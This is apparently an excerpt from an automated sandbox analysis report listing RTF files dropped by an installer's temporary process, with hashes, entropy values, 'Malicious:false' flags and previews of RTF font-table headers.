                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 0204050305040603020
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36715
                                                                                                                                                                                                                                                          Entropy (8bit):5.031988851778873
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:w4FkNxjETicPI0QhhiLVDfpZMHDMI4ZlZ/6A9T:w4G3UnnIA9T
                                                                                                                                                                                                                                                          MD5:3782483D6EE007A1D36CF22E4377E736
                                                                                                                                                                                                                                                          SHA1:28407BF172DD8CE139D46271AA509A64AE3C96E4
                                                                                                                                                                                                                                                          SHA-256:6E7E08A47C098030ADE2040BB9605B271619E9D57FB57BF9C2895710B64485A9
                                                                                                                                                                                                                                                          SHA-512:7AC317D52EADCF7EE5C9B1244FAA030376953ECD7227F0735D8755BDE2F6E483DA6D8D629A8D978A16EF1969D94DBFBAF6342B3BFFAA58BF61B2874959A4E2A2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):37414
                                                                                                                                                                                                                                                          Entropy (8bit):5.037445111384111
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkGN4JS0TaGC5X2kccMG+vK5j8kES638TFeq4Tf:VkHA4Tf
                                                                                                                                                                                                                                                          MD5:EEF6FD9574018AB7519DF0FE47A51EAD
                                                                                                                                                                                                                                                          SHA1:58D45358315413816630C67BC892C7B20B986589
                                                                                                                                                                                                                                                          SHA-256:8B7C442F64A83CF255F5A9B2EC6A9152A697A4198033C1727A63F1CCCF340231
                                                                                                                                                                                                                                                          SHA-512:90D71196AFFFCFA83AC1F0DF325B18FF8871D9B45934676BD7105D8FEBF2EAF15C6AB4E0ABB93FBAE9A160F3B6197102117E527A8FDE66BA50E7A2AE0A03493C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhi
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44025
                                                                                                                                                                                                                                                          Entropy (8bit):5.051099948351621
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmqoRWhsPVafhFuogRkPcStxSUeXeq4Ts:VklnIqi4Ts
                                                                                                                                                                                                                                                          MD5:FCD907A82F0CC0B40AB352E6A1D330A9
                                                                                                                                                                                                                                                          SHA1:AB3E2A7ED7791D51D6656A5A133A09CB87A98688
                                                                                                                                                                                                                                                          SHA-256:20618AE093716DFFBF4B00CEBAADE7A5E33D628858BE3B81DD766343752CA2EF
                                                                                                                                                                                                                                                          SHA-512:260890BB6352AE544AFA660DB1CF91CC1CDF5A2843F753F9291F1DB96E7B7E7E1BA10960E48A58F9B42CDD20CFE33C27A10A0A522A713EE8D95711A8ED31A307
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):46393
                                                                                                                                                                                                                                                          Entropy (8bit):5.040883358685065
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmq9RXRjOotI3qyLbfl4vBLbflAvQLbft:VklnIqG4Tb
                                                                                                                                                                                                                                                          MD5:A44BC6DAA0FB852B0CC5F2930B338509
                                                                                                                                                                                                                                                          SHA1:2E78886E8630AA1D8AEB320F5324635B36FE241E
                                                                                                                                                                                                                                                          SHA-256:87355813ED68AB3CC1FC6AC77DBC2AA16248012FACAEE98F06F106A28D2F688D
                                                                                                                                                                                                                                                          SHA-512:A589A22F3E556B104ECA9D4E557B65218C254587DC3CD73569D7F0101CD1073E61068699BD48CF0B4A695772C82FAD1A689ABC7D6CCB90A043E1FE729140B795
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42991
                                                                                                                                                                                                                                                          Entropy (8bit):5.042023549126302
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqFkwxjeVGh+DoLLXI1nhDGi3w2EHlT2njX8x3DGRlBB42Nn92knS7eOZ/6A97:wqR3zIA97
                                                                                                                                                                                                                                                          MD5:4406D386834A212EB3AD85B6410AEE1B
                                                                                                                                                                                                                                                          SHA1:FE40A4177AEBEF814E9104273942637E62180E61
                                                                                                                                                                                                                                                          SHA-256:4C083A2E2B9A6314BE4C4616010210D7191A949BB5849D140631CAA6AF0B8E5D
                                                                                                                                                                                                                                                          SHA-512:DAD1AC26094545FFBB57D74B6C04ACB2E5279F8B045D3BD53CB27ACD877F6FDC4C9A6894B7A703C5A94EF6805E2AD98D7B1C6588CF9CF90BB790AE2625AA8AD0
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45200
                                                                                                                                                                                                                                                          Entropy (8bit):5.054793082738369
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmm38RiaKvX2pBEz/9qj+793RM1HWMV5XA:VklnI3K4T7
                                                                                                                                                                                                                                                          MD5:C60A8FC0107FBDBEF9FDD171B44442FD
                                                                                                                                                                                                                                                          SHA1:F0F4187630411D3F6F0DE7ECD98CE99AAD45AAD9
                                                                                                                                                                                                                                                          SHA-256:576A4766C686DC03E95228C84262970BC266ECE801DB7127E68EB8F1080CCFFC
                                                                                                                                                                                                                                                          SHA-512:5E209424A9E25DF565C3648A4350AD76FF144165ACBF02FCD891B1F6EB87AA0CEBE3710F9903D9F796005724B44843E8D36E41768BF2E4188191E97ED58D5C61
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):39446
                                                                                                                                                                                                                                                          Entropy (8bit):5.027602531409886
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:qY6g3X45Y8qb7PzybdKkjnxhVj+pmvhY3q2g4Qi6rGsoUwEAG2DaGa:qhg3WxhVCpm5cNZdU4a
                                                                                                                                                                                                                                                          MD5:D0412C982483B1FF14AFA1B5C84956B2
                                                                                                                                                                                                                                                          SHA1:1CBFDCC34F3DBFAC69E0DBC156B7A14A9E68F0FF
                                                                                                                                                                                                                                                          SHA-256:BB09C2D2E43E921D0A42D1EB90AC5EB5639D85A5DFAECF38D36DC3B1D35DF9F8
                                                                                                                                                                                                                                                          SHA-512:A1545A9E433401BB884D801D9FE76C37D8F00A68E9569A62873142446271FEF153A3B2770BA0F9FF11179DCEF03803ECD5CDC9DAA651FCF6036B36FD27556367
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang3082\deflangfe3082\themelang3082\themelangfe0\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fh
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42179
                                                                                                                                                                                                                                                          Entropy (8bit):5.051623327565713
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmVQP9RTaC0n1azbtSqqjgq4Tt:VklnIVQPc4Tt
                                                                                                                                                                                                                                                          MD5:5BF7705E104DAE21287D29BA6B73F990
                                                                                                                                                                                                                                                          SHA1:68FE0FAEB83DD82163599C4A0C86A42EB0E1645F
                                                                                                                                                                                                                                                          SHA-256:425E9788DA3299CCF2FE2E25AD8E4BF0EF65F22E2F10702C7EDA2FA6D160917A
                                                                                                                                                                                                                                                          SHA-512:A3D6C652A8C362B22B5F4FE4879411C5468DAAE6ACB6A13DA947D14C8E483C83138DC18212E8D2A1D22656985A2AFED8373A7023B4C4D0BD3992EDBEA0D7875E
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):53715
                                                                                                                                                                                                                                                          Entropy (8bit):5.038599976742919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk13TxjelQcX09coHJreOYSN4UIRopZMggLBbWm6V6ER4IE5RP9lIXsqJo6vjo4S:VkLjcv4TI
                                                                                                                                                                                                                                                          MD5:6E82D6B3AAD2EAEC506AA8ABD4728C58
                                                                                                                                                                                                                                                          SHA1:622141D986976DC0ADB2DB17698DBC082BE74674
                                                                                                                                                                                                                                                          SHA-256:91A6F151A727086D36660F130446F70FE6115808C5E56FA36FC82A8CAE25A481
                                                                                                                                                                                                                                                          SHA-512:B0C477686E7583EF9412912A72A7644F80D20EB8EF904E7B0A3F2F89D4B2DB0DD7FC9FDB61B4969787AAE3C931D1B15EA8BAE1BC07CE3D340F40CD3D182804A9
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43096
                                                                                                                                                                                                                                                          Entropy (8bit):5.0549310472842155
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1IwSxjeXQuTJcOerjj1oKauIKx49kWYhRnFJR2qitxAC5fAw7Wcu7aoZq4TR:VkzQUS7A4TR
                                                                                                                                                                                                                                                          MD5:CFFAB85802341BBD48B8494EE847AB9A
                                                                                                                                                                                                                                                          SHA1:06FA12A2151BA01366452069E218382C32581B41
                                                                                                                                                                                                                                                          SHA-256:51C57212580E8C320617943231A7BA8D592F77544E3BF302E89A419F68EFF751
                                                                                                                                                                                                                                                          SHA-512:99C5E288398E430D0BEC05F3EE93044136DE019BF5A98962550B7D82D069441DC507BE9A22DCCEF62058AA64BF7F78D252BE579899DFF252F25F422C00113772
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f39\fbidi \fswiss\fcharset0\fprq2 Arial CYR;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \fro
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):39446
                                                                                                                                                                                                                                                          Entropy (8bit):5.027602531409886
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:qY6g3X45Y8qb7PzybdKkjnxhVj+pmvhY3q2g4Qi6rGsoUwEAG2DaGa:qhg3WxhVCpm5cNZdU4a
                                                                                                                                                                                                                                                          MD5:D0412C982483B1FF14AFA1B5C84956B2
                                                                                                                                                                                                                                                          SHA1:1CBFDCC34F3DBFAC69E0DBC156B7A14A9E68F0FF
                                                                                                                                                                                                                                                          SHA-256:BB09C2D2E43E921D0A42D1EB90AC5EB5639D85A5DFAECF38D36DC3B1D35DF9F8
                                                                                                                                                                                                                                                          SHA-512:A1545A9E433401BB884D801D9FE76C37D8F00A68E9569A62873142446271FEF153A3B2770BA0F9FF11179DCEF03803ECD5CDC9DAA651FCF6036B36FD27556367
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang3082\deflangfe3082\themelang3082\themelangfe0\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fh
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):52940
                                                                                                                                                                                                                                                          Entropy (8bit):4.975127205823685
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqeaxjEJHT2njX8x3TLjwUtqYepAkVZEdvI9DhL8DqGJU4wEgmODwKEPrTDjwEaP:wql9hL8/44J0IA9H
                                                                                                                                                                                                                                                          MD5:3F8E8B70614BCFC77C9E8A18E5B10EBF
                                                                                                                                                                                                                                                          SHA1:1AAEB77F20B21A38684CDEDB73575D291C903060
                                                                                                                                                                                                                                                          SHA-256:F55FBEE6CA1A13B8462150E411B63B84763DA220846DF944877DB2F3C617D8AC
                                                                                                                                                                                                                                                          SHA-512:1C4262B5FB06626E41CF0CDD834F8A36007354934A07A24E4FF03BD6DBE45F4E8D52E06B4A08081E2AFEA8CCDD59E684ACF7241EC30B00AF526AB61A5F88ECAC
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
